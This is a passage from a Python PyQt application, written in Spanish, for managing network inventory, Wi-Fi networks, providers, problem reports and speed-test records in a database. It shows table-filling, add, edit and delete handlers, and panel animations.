self.ui.I_DEP.addItem(str(i[0])+\":\"+i[1])\r\n dep=db.consultarRED()\r\n self.ui.I_RED.clear()\r\n for i in dep: self.ui.I_RED.addItem(str(i[0])+\":\"+i[1])\r\n self.borrarTabla()\r\n for i in range(0,8): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"No. Inventario\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Nombre\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Descripción\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"Ubicación\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"Tipo Conexión\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(6,QTableWidgetItem(\"Red\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(7,QTableWidgetItem(\"Departamento\"))\r\n aux = db.consultarDISPOSITIVOS()\r\n self.agregarF(self.ui.SalidaGestion,aux,8)\r\n def DBProveedores(self):\r\n self.seccionadoDB(self.ui.G_P,\"P\")\r\n dep=db.consultarTRANSMISION()\r\n self.ui.P_TR.clear()\r\n for i in dep: self.ui.P_TR.addItem(str(i[0])+\":\"+i[1])\r\n self.borrarTabla()\r\n for i in range(0,6): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"Nombre\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Descripción\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Fecha\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"Telefono\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"Tipo\"))\r\n aux = db.consultarPROVEEDOR()\r\n self.agregarF(self.ui.SalidaGestion,aux,6)\r\n def DBRedes(self):\r\n self.seccionadoDB(self.ui.G_RD,\"RD\")\r\n dep=db.consultarPROVEEDOR()\r\n self.ui.RD_PROV.clear()\r\n for i in dep: self.ui.RD_PROV.addItem(str(i[0])+\":\"+i[1])\r\n self.borrarTabla()\r\n for i in range(0,6): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"SSID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Contraseña\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Subida\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"Bajada\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"Proveedor\"))\r\n aux = db.consultarRED()\r\n self.agregarF(self.ui.SalidaGestion,aux,6)\r\n def DBControlRed(self):\r\n self.seccionadoDB(self.ui.G_CR,\"CR\")\r\n dep=db.consultarDEPARTAMENTOS()\r\n self.ui.CR_DEP.clear()\r\n for i in dep: self.ui.CR_DEP.addItem(str(i[0])+\":\"+i[1])\r\n dep=db.consultarRED()\r\n self.ui.CR_RED.clear()\r\n for i in dep: self.ui.CR_RED.addItem(str(i[0])+\":\"+i[1])\r\n self.borrarTabla()\r\n for i in range(0,14): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"Fecha\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"SSID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"No. 
Inventario\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"Estado\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"Host\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(6,QTableWidgetItem(\"IPv4\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(7,QTableWidgetItem(\"Vendor\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(8,QTableWidgetItem(\"MAC\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(9,QTableWidgetItem(\"Usuario\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(10,QTableWidgetItem(\"Observaciones\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(11,QTableWidgetItem(\"Verificado\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(12,QTableWidgetItem(\"Tipo\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(13,QTableWidgetItem(\"Departamento\"))\r\n aux = db.consultarCONTROL_RED_ESPECIFICA()\r\n reg=0\r\n self.agregarF(self.ui.SalidaGestion,aux,14)\r\n\r\n def DBUnidades(self):\r\n self.seccionadoDB(self.ui.G_SU,\"U\")\r\n dep=db.consultarTRANSMISION()\r\n self.ui.SU_TR.clear()\r\n for i in dep: self.ui.SU_TR.addItem(str(i[0])+\":\"+i[1])\r\n self.borrarTabla()\r\n for i in range(0,9): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"Coordinación\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Nombre\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Con Internet\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"Proveedor\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"Observaciones\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(6,QTableWidgetItem(\"Fecha\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(7,QTableWidgetItem(\"Telefono\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(8,QTableWidgetItem(\"Tipo Transmisión\"))\r\n aux = db.consultarUNIDADES_INTERNET()\r\n self.agregarF(self.ui.SalidaGestion,aux,9)\r\n \r\n def DBDepartamentos(self):\r\n self.seccionadoDB(self.ui.G_D,\"D\")\r\n self.borrarTabla()\r\n for i in range(0,3): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"Nombre\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Descripcion\"))\r\n aux = db.consultarDEPARTAMENTOS()\r\n reg=0\r\n self.agregarF(self.ui.SalidaGestion,aux,3)\r\n\r\n def DBConexiones(self):\r\n self.seccionadoDB(self.ui.G_C,\"C\")\r\n self.borrarTabla()\r\n for i in range(0,4): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"SSID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Fecha\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Conexiones\"))\r\n aux = db.consultarHISTORIAL_NUM_CONEXIONES()\r\n reg=0\r\n self.agregarF(self.ui.SalidaGestion,aux,4)\r\n def DBPruebas(self):\r\n for i in range(0,self.ui.TablaVelocidad.rowCount()): self.ui.TablaVelocidad.removeRow(i)\r\n self.ui.TablaVelocidad.setRowCount(0)\r\n for i in range(0,self.ui.TablaVelocidad.columnCount()): self.ui.TablaVelocidad.removeColumn(i)\r\n self.ui.TablaVelocidad.setColumnCount(0)\r\n for i in range (0,12): 
self.ui.TablaVelocidad.insertColumn(i)\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(1,QTableWidgetItem(\"Fecha\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(2,QTableWidgetItem(\"Hora\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(3,QTableWidgetItem(\"Host\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(4,QTableWidgetItem(\"Sponsor\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(5,QTableWidgetItem(\"Red\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(6,QTableWidgetItem(\"Subida\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(7,QTableWidgetItem(\"Bajada\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(8,QTableWidgetItem(\"Latencia (S)\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(9,QTableWidgetItem(\"Latencia (B)\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(10,QTableWidgetItem(\"Ping\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(11,QTableWidgetItem(\"Resultado\"))\r\n aux = db.consultarPRUEBAS_VELOCIDAD()\r\n reg=0\r\n self.agregarFS(self.ui.TablaVelocidad,aux,12)\r\n \r\n\r\n def DBHosts(self):\r\n self.seccionadoDB(self.ui.G_H,\"H\")\r\n self.borrarTabla()\r\n for i in range(0,7): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"FECHA\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"SSID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Host\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"IPv4\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"MAC\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(6,QTableWidgetItem(\"VENDOR\"))\r\n aux = db.consultarHISTORIAL_CONEXIONES()\r\n reg=0\r\n self.agregarF(self.ui.SalidaGestion,aux,7)\r\n def borrarTabla(self):\r\n for i in range(0,self.ui.SalidaGestion.rowCount()): self.ui.SalidaGestion.removeRow(i)\r\n self.ui.SalidaGestion.setRowCount(0)\r\n for i in range(0,self.ui.SalidaGestion.columnCount()): self.ui.SalidaGestion.removeColumn(i)\r\n self.ui.SalidaGestion.setColumnCount(0)\r\n def DBcerrarMenuAct(self):\r\n if self.indicadorV==\"PR\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_PR)\r\n elif self.indicadorV==\"R\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_R)\r\n elif self.indicadorV==\"I\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_I)\r\n elif self.indicadorV==\"P\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_P)\r\n elif self.indicadorV==\"RD\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_RD)\r\n elif self.indicadorV==\"CR\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_CR)\r\n elif self.indicadorV==\"U\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_SU)\r\n elif self.indicadorV==\"D\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_D)\r\n self.limpiarCampos()\r\n self.indicadorV=\"\"\r\n def DBAbrirMenuAct(self):\r\n if self.indicadorV!=self.indicador:\r\n self.DBcerrarMenuAct()\r\n if self.indicador==\"PR\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_PR)\r\n elif self.indicador==\"R\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_R)\r\n elif self.indicador==\"I\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_I)\r\n elif self.indicador==\"P\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_P)\r\n elif self.indicador==\"RD\":\r\n 
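# Slide open the edit panel that belongs to the RED (networks) table.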
self.animacion_Vertical_Inicio(0,200,500,self.ui.P_RD)\r\n elif self.indicador==\"CR\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_CR)\r\n elif self.indicador==\"U\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_SU)\r\n elif self.indicador==\"D\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_D)\r\n self.indicadorV=self.indicador\r\n else:\r\n if self.indicadorM==False:\r\n self.DBcerrarMenuAct()\r\n formato=\"border-radius:10px;padding: 8px 8px;\"\r\n self.ui.GModificarBtn.setStyleSheet(formato)\r\n self.ui.GEliminarBtn.setStyleSheet(formato)\r\n self.ui.GModificarBtn.setEnabled(False)\r\n self.ui.GEliminarBtn.setEnabled(False)\r\n formato=\"border-radius:10px;background-color: #20945e;\tpadding: 8px 8px;\"\r\n self.ui.CR_ADD.setStyleSheet(formato)\r\n self.ui.D_ADD.setStyleSheet(formato)\r\n self.ui.I_ADD.setStyleSheet(formato)\r\n self.ui.P_ADD.setStyleSheet(formato)\r\n self.ui.G_AgregarBtn.setStyleSheet(formato)\r\n self.ui.R_ADD.setStyleSheet(formato)\r\n self.ui.RD_ADD.setStyleSheet(formato)\r\n self.ui.SU_ADD.setStyleSheet(formato)\r\n self.ui.D_ADD.setEnabled(True)\r\n self.ui.I_ADD.setEnabled(True)\r\n self.ui.R_ADD.setEnabled(True)\r\n self.ui.P_ADD.setEnabled(True)\r\n self.ui.CR_ADD.setEnabled(True)\r\n self.ui.RD_ADD.setEnabled(True)\r\n self.ui.SU_ADD.setEnabled(True)\r\n self.ui.G_AgregarBtn.setEnabled(True)\r\n self.ui.SU_ID.setEnabled(True)\r\n indicadorM=False\r\n def DBagregar(self):\r\n self.indicadorM=False\r\n self.DBAbrirMenuAct()\r\n def DBCR_ADD(self):\r\n db.insertarCONTROL_RED_ESPECIFICA(int(self.TextoComboBox(self.ui.CR_RED).split(\":\")[0]),self.ui.CR_IP.text(),self.ui.CR_NOINV.text(),self.TextoComboBox(self.ui.CR_STAT),self.ui.CR_MAC.text(),self.ui.CR_RESP.text(),self.ui.CR_FECHA.text(),self.ui.CR_OBS.toPlainText(),self.ui.CR_HOS.text(),self.TextoComboBox(self.ui.CR_VERFI),self.TextoComboBox(self.ui.CR_TIP),int(self.TextoComboBox(self.ui.CR_DEP).split(\":\")[0]),self.ui.CR_VEND.text())\r\n self.DBControlRed()\r\n def DBD_ADD(self):\r\n db.insertarDEPARTAMENTOS(self.ui.D_NOM.text(),self.ui.D_DES.toPlainText())\r\n self.DBDepartamentos()\r\n def DBI_ADD(self):\r\n db.insertarDISPOSITIVOS(self.ui.I_ID.text(),self.ui.I_NOM.text(),self.ui.I_DESC.toPlainText(),self.ui.I_UBI.text(),self.TextoComboBox(self.ui.I_TC),int(self.TextoComboBox(self.ui.I_RED).split(\":\")[0]),int(self.TextoComboBox(self.ui.I_DEP).split(\":\")[0]))\r\n self.DBinvernario()\r\n def DBP_ADD(self):\r\n db.insertarPROVEEDOR(self.ui.P_N.text(),self.ui.P_DES.toPlainText(),self.ui.P_FECH.text(),self.ui.P_TEL.text(),int(self.TextoComboBox(self.ui.P_TR).split(\":\")[0]))\r\n self.DBProveedores()\r\n def DBP_PR(self):\r\n db.insertarPROBLEMAS_RED(self.ui.PR_DESC.toPlainText(),self.ui.PR_FECHA.text(),self.ui.PR_SOL.toPlainText(),self.TextoComboBox(self.ui.PR_COR),self.ui.PR_FECHAC.text(),int(self.TextoComboBox(self.ui.PR_RED).split(\":\")[0]),int(self.TextoComboBox(self.ui.PR_DEP).split(\":\")[0]))\r\n self.DBproblemasRed()\r\n def DBP_R(self):\r\n db.insertarREPORTES(self.ui.R_Folio.text(),self.ui.R_Descrip.toPlainText(),self.ui.R_Fecha.text(),self.TextoComboBox(self.ui.R_ACUDIO),self.TextoComboBox(self.ui.R_REMOSIT),self.ui.R_MOT.toPlainText(),self.ui.R_TEL.text(),self.ui.R_ATEND.text(),int(self.TextoComboBox(self.ui.R_PROV).split(\":\")[0]))\r\n self.DBreportes()\r\n def DBP_RD(self):\r\n db.insertarRED(self.ui.RD_S.text(),self.ui.RD_PASS.text(),float(self.ui.RD_SUB.text()),float(self.ui.RD_DAJ.text()),int(self.TextoComboBox(self.ui.RD_PROV).split(\":\")[0]))\r\n 
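# Refresh the networks listing so the newly inserted row is visible at once.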
self.DBRedes()\r\n def DBP_SU(self):\r\n db.insertarUNIDADES_INTERNET(self.ui.SU_ID.text(),self.ui.SU_NOM.text(),self.ui.SU_CORD.text(),self.TextoComboBox(self.ui.SU_SERV),self.ui.SU_PROVE.text(),self.ui.SU_OBS.toPlainText(),self.ui.SU_FECHA.text(),self.ui.SU_TEL.text(),int(self.TextoComboBox(self.ui.SU_TR).split(\":\")[0]))\r\n self.DBUnidades()\r\n def DBEliminar(self):\r\n if self.indicador==\"PR\":\r\n db.borrarPROBLEMAS_RED(int(self.ID))\r\n self.DBproblemasRed()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"R\":\r\n db.borrarREPORTES(int(self.ID))\r\n self.DBreportes()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"I\":\r\n db.borrarDISPOSITIVOS(int(self.ID))\r\n self.DBinvernario()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"P\":\r\n db.borrarPROVEEDOR(int(self.ID))\r\n self.DBProveedores()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"RD\":\r\n db.borrarRED(int(self.ID))\r\n self.DBRedes()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"CR\":\r\n db.borrarCONTROL_RED_ESPECIFICA(int(self.ID))\r\n self.DBcerrarMenuAct()\r\n self.DBControlRed()\r\n elif self.indicador==\"U\":\r\n db.borrarUNIDADES_INTERNET(self.ui.SU_ID.text())\r\n self.DBcerrarMenuAct()\r\n self.DBUnidades()\r\n elif self.indicador==\"D\":\r\n db.borrarDEPARTAMENTOS(int(self.ID))\r\n self.DBcerrarMenuAct()\r\n self.DBDepartamentos()\r\n\r\n def DBModificar(self):\r\n if self.indicador==\"PR\":\r\n db.modificarPROBLEMAS_RED(int(self.ID),self.ui.PR_DESC.toPlainText(),self.ui.PR_FECHA.text(),self.ui.PR_SOL.toPlainText(),self.TextoComboBox(self.ui.PR_COR),self.ui.PR_FECHAC.text(),int(self.TextoComboBox(self.ui.PR_RED).split(\":\")[0]),int(self.TextoComboBox(self.ui.PR_DEP).split(\":\")[0]))\r\n self.DBproblemasRed()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"R\":\r\n db.modificarREPORTES(int(self.ID),self.ui.R_Folio.text(),self.ui.R_Descrip.toPlainText(),self.ui.R_Fecha.text(),self.TextoComboBox(self.ui.R_ACUDIO),self.TextoComboBox(self.ui.R_REMOSIT),self.ui.R_MOT.toPlainText(),self.ui.R_TEL.text(),self.ui.R_ATEND.text(),int(self.TextoComboBox(self.ui.R_PROV).split(\":\")[0]))\r\n self.DBreportes()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"I\":\r\n db.modificarDISPOSITIVOS(int(self.ID),self.ui.I_ID.text(),self.ui.I_NOM.text(),self.ui.I_DESC.toPlainText(),self.ui.I_UBI.text(),self.TextoComboBox(self.ui.I_TC),int(self.TextoComboBox(self.ui.I_RED).split(\":\")[0]),int(self.TextoComboBox(self.ui.I_DEP).split(\":\")[0]))\r\n self.DBinvernario()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"P\":\r\n db.modificarPROVEEDOR(int(self.ID),self.ui.P_N.text(),self.ui.P_DES.toPlainText(),self.ui.P_FECH.text(),self.ui.P_TEL.text(),int(self.TextoComboBox(self.ui.P_TR).split(\":\")[0]))\r\n self.DBProveedores()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"RD\":\r\n db.modificarRED(int(self.ID),self.ui.RD_S.text(),self.ui.RD_PASS.text(),float(self.ui.RD_SUB.text()),float(self.ui.RD_DAJ.text()),int(self.TextoComboBox(self.ui.RD_PROV).split(\":\")[0]))\r\n self.DBRedes()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"CR\":\r\n 
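# Push every field of the CONTROL_RED_ESPECIFICA editor back to the database in a single update.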
db.modificarCONTROL_RED_ESPECIFICA(int(self.ID),int(self.TextoComboBox(self.ui.CR_RED).split(\":\")[0]),self.ui.CR_IP.text(),self.ui.CR_NOINV.text(),self.TextoComboBox(self.ui.CR_STAT),self.ui.CR_MAC.text(),self.ui.CR_RESP.text(),self.ui.CR_FECHA.text(),self.ui.CR_OBS.toPlainText(),self.ui.CR_HOS.text(),self.TextoComboBox(self.ui.CR_VERFI),self.TextoComboBox(self.ui.CR_TIP),int(self.TextoComboBox(self.ui.CR_DEP).split(\":\")[0]),self.ui.CR_VEND.text())\r\n self.DBcerrarMenuAct()\r\n self.DBControlRed()\r\n elif self.indicador==\"U\":\r\n db.modificarUNIDADES_INTERNET(self.ui.SU_ID.text(),self.ui.SU_NOM.text(),self.ui.SU_CORD.text(),self.TextoComboBox(self.ui.SU_SERV),self.ui.SU_PROVE.text(),self.ui.SU_OBS.toPlainText(),self.ui.SU_FECHA.text(),self.ui.SU_TEL.text(),int(self.TextoComboBox(self.ui.SU_TR).split(\":\")[0]))\r\n self.DBcerrarMenuAct()\r\n self.DBUnidades()\r\n elif self.indicador==\"D\":\r\n db.modificarDEPARTAMENTOS(int(self.ID),self.ui.D_NOM.text(),self.ui.D_DES.toPlainText())\r\n self.DBcerrarMenuAct()\r\n self.DBDepartamentos()\r\n self.DBcerrarMenuAct()\r\n formato=\"border-radius:10px;padding: 8px 8px;\"\r\n self.ui.GModificarBtn.setStyleSheet(formato)\r\n self.ui.GEliminarBtn.setStyleSheet(formato)\r\n self.ui.GModificarBtn.setEnabled(False)\r\n self.ui.GEliminarBtn.setEnabled(False)\r\n formato=\"border-radius:10px;background-color: #20945e;\tpadding: 8px 8px;\"\r\n self.ui.CR_ADD.setStyleSheet(formato)\r\n self.ui.D_ADD.setStyleSheet(formato)\r\n self.ui.I_ADD.setStyleSheet(formato)\r\n self.ui.P_ADD.setStyleSheet(formato)\r\n self.ui.G_AgregarBtn.setStyleSheet(formato)\r\n self.ui.R_ADD.setStyleSheet(formato)\r\n self.ui.RD_ADD.setStyleSheet(formato)\r\n self.ui.SU_ADD.setStyleSheet(formato)\r\n self.ui.D_ADD.setEnabled(True)\r\n self.ui.I_ADD.setEnabled(True)\r\n self.ui.R_ADD.setEnabled(True)\r\n self.ui.P_ADD.setEnabled(True)\r\n self.ui.CR_ADD.setEnabled(True)\r\n self.ui.RD_ADD.setEnabled(True)\r\n self.ui.SU_ADD.setEnabled(True)\r\n self.ui.G_AgregarBtn.setEnabled(True)\r\n self.ui.SU_ID.setEnabled(True)\r\n def TextoComboBox(self,item):\r\n aux= item.itemText(item.currentIndex())\r\n return aux \r\n ID=None\r\n def dobleGestion(self):\r\n self.ID=None\r\n self.indicadorM=True\r\n self.DBAbrirMenuAct()\r\n formato=\"border-radius:10px;background-color: #20945e;\tpadding: 8px 8px;\"\r\n self.ui.GModificarBtn.setEnabled(True)\r\n self.ui.GEliminarBtn.setEnabled(True)\r\n self.ui.GModificarBtn.setStyleSheet(formato)\r\n self.ui.GEliminarBtn.setStyleSheet(formato)\r\n self.ui.D_ADD.setEnabled(False)\r\n self.ui.I_ADD.setEnabled(False)\r\n self.ui.R_ADD.setEnabled(False)\r\n self.ui.P_ADD.setEnabled(False)\r\n self.ui.CR_ADD.setEnabled(False)\r\n self.ui.RD_ADD.setEnabled(False)\r\n self.ui.SU_ADD.setEnabled(False)\r\n self.ui.SU_ID.setEnabled(False)\r\n formato=\"border-radius:10px;padding: 8px 8px;\"\r\n self.ui.CR_ADD.setStyleSheet(formato)\r\n self.ui.D_ADD.setStyleSheet(formato)\r\n self.ui.I_ADD.setStyleSheet(formato)\r\n self.ui.P_ADD.setStyleSheet(formato)\r\n self.ui.G_AgregarBtn.setStyleSheet(formato)\r\n self.ui.R_ADD.setStyleSheet(formato)\r\n self.ui.RD_ADD.setStyleSheet(formato)\r\n self.ui.SU_ADD.setStyleSheet(formato)\r\n\r\n self.ui.G_AgregarBtn.setEnabled(False)\r\n row_number=0\r\n for idx in self.ui.SalidaGestion.selectionModel().selectedIndexes():\r\n row_number = idx.row()\r\n aux=[]\r\n for i in range(0,self.ui.SalidaGestion.columnCount()):\r\n aux.append(self.ui.SalidaGestion.item(row_number,i).text())\r\n self.ID=str(aux[0])\r\n \r\n if 
self.indicador==\"PR\":\r\n self.ui.PR_DESC.setText(aux[1])\r\n self.ui.PR_FECHA.setText(aux[2])\r\n self.ui.PR_SOL.setText(aux[3])\r\n self.ui.PR_COR.clear()\r\n self.ui.PR_COR.addItem(aux[4])\r\n if aux[4]==\"No corregido\": self.ui.PR_COR.addItem(\"Corregido\")\r\n elif aux[4]==\"Corregido\": self.ui.PR_COR.addItem(\"No corregido\")\r\n else: \r\n self.ui.PR_COR.addItem(\"Corregido\")\r\n self.ui.PR_COR.addItem(\"No corregido\")\r\n self.ui.PR_FECHAC.setText(aux[5])\r\n self.comboDB(self.ui.PR_RED,f\"SELECT ID_RED FROM PROBLEMAS_RED WHERE ID_PROBLEMA={aux[0]}\",db.consultarRED(),aux[6])\r\n self.comboDB(self.ui.PR_DEP,f\"SELECT ID_DEPARTAMENTO FROM PROBLEMAS_RED WHERE ID_PROBLEMA={aux[0]}\",db.consultarDEPARTAMENTOS(),aux[7])\r\n \r\n elif self.indicador==\"R\":\r\n self.ui.R_Folio.setText(aux[1])\r\n self.ui.R_Descrip.setText(aux[2])\r\n self.ui.R_Fecha.setText(aux[3])\r\n self.ui.R_ACUDIO.clear()\r\n self.ui.R_ACUDIO.addItem(aux[4])\r\n if aux[4]==\"No acudio al sitio\": self.ui.R_ACUDIO.addItem(\"Acudio al sitio\")\r\n elif aux[4]==\"Acudio al sitio\": self.ui.R_ACUDIO.addItem(\"No acudio al sitio\")\r\n else: \r\n self.ui.R_ACUDIO.addItem(\"Acudio al sitio\")\r\n self.ui.R_ACUDIO.addItem(\"No acudio al sitio\")\r\n self.ui.R_REMOSIT.clear()\r\n self.ui.R_REMOSIT.addItem(aux[5])\r\n if aux[5]==\"Procedimiento de manera Remota\": self.ui.R_REMOSIT.addItem(\"Procedimientos en Sitio\")\r\n elif aux[5]==\"Procedimientos en Sitio\": self.ui.R_REMOSIT.addItem(\"Procedimiento de manera Remota\")\r\n else: \r\n self.ui.R_REMOSIT.addItem(\"Procedimiento de manera Remota\")\r\n self.ui.R_REMOSIT.addItem(\"Procedimientos en Sitio\")\r\n self.ui.R_MOT.setText(aux[6])\r\n self.ui.R_TEL.setText(aux[7])\r\n self.ui.R_ATEND.setText(aux[8])\r\n self.comboDB(self.ui.R_PROV,f\"SELECT ID_PROVEEDOR FROM REPORTES WHERE ID_REPORTE={aux[0]}\",db.consultarPROVEEDOR(),aux[9])\r\n elif self.indicador==\"I\":\r\n self.ui.I_ID.setText(aux[1])\r\n self.ui.I_NOM.setText(aux[2])\r\n self.ui.I_DESC.setText(aux[3])\r\n self.ui.I_UBI.setText(aux[4])\r\n self.ui.I_TC.clear()\r\n self.ui.I_TC.addItem(aux[5])\r\n if aux[5]==\"Inalámbrica\": \r\n self.ui.I_TC.addItem(\"Alambrica\")\r\n self.ui.I_TC.addItem(\"No Aplica\")\r\n elif aux[5]==\"Alambrica\": \r\n self.ui.I_TC.addItem(\"Inalámbrica\")\r\n self.ui.I_TC.addItem(\"No Aplica\")\r\n elif aux[5]==\"No aplica\": \r\n self.ui.I_TC.addItem(\"Alambrica\")\r\n self.ui.I_TC.addItem(\"Inalámbrica\")\r\n else: \r\n self.ui.I_TC.addItem(\"Alambrica\")\r\n self.ui.I_TC.addItem(\"Inalámbrica\")\r\n self.ui.I_TC.addItem(\"No Aplica\")\r\n self.comboDB(self.ui.I_RED,f\"SELECT ID_RED FROM DISPOSITIVOS WHERE ID_DISPOSITIVO={aux[0]}\",db.consultarRED(),aux[6])\r\n self.comboDB(self.ui.I_DEP,f\"SELECT ID_DEPARTAMENTO FROM DISPOSITIVOS WHERE ID_DISPOSITIVO={aux[0]}\",db.consultarDEPARTAMENTOS(),aux[7])\r\n elif self.indicador==\"P\":\r\n self.ui.P_N.setText(aux[1])\r\n self.ui.P_DES.setText(aux[2])\r\n self.ui.P_FECH.setText(aux[3])\r\n self.ui.P_TEL.setText(aux[4])\r\n self.comboDB(self.ui.P_TR,f\"SELECT ID_TRANSMISION FROM PROVEEDOR WHERE ID_PROVEEDOR={aux[0]}\",db.consultarTRANSMISION(),aux[5])\r\n elif self.indicador==\"RD\":\r\n self.ui.RD_S.setText(aux[1])\r\n self.ui.RD_PASS.setText(aux[2])\r\n self.ui.RD_SUB.setText(aux[3])\r\n self.ui.RD_DAJ.setText(aux[4])\r\n self.comboDB(self.ui.RD_PROV,f\"SELECT ID_PROVEEDOR FROM RED WHERE 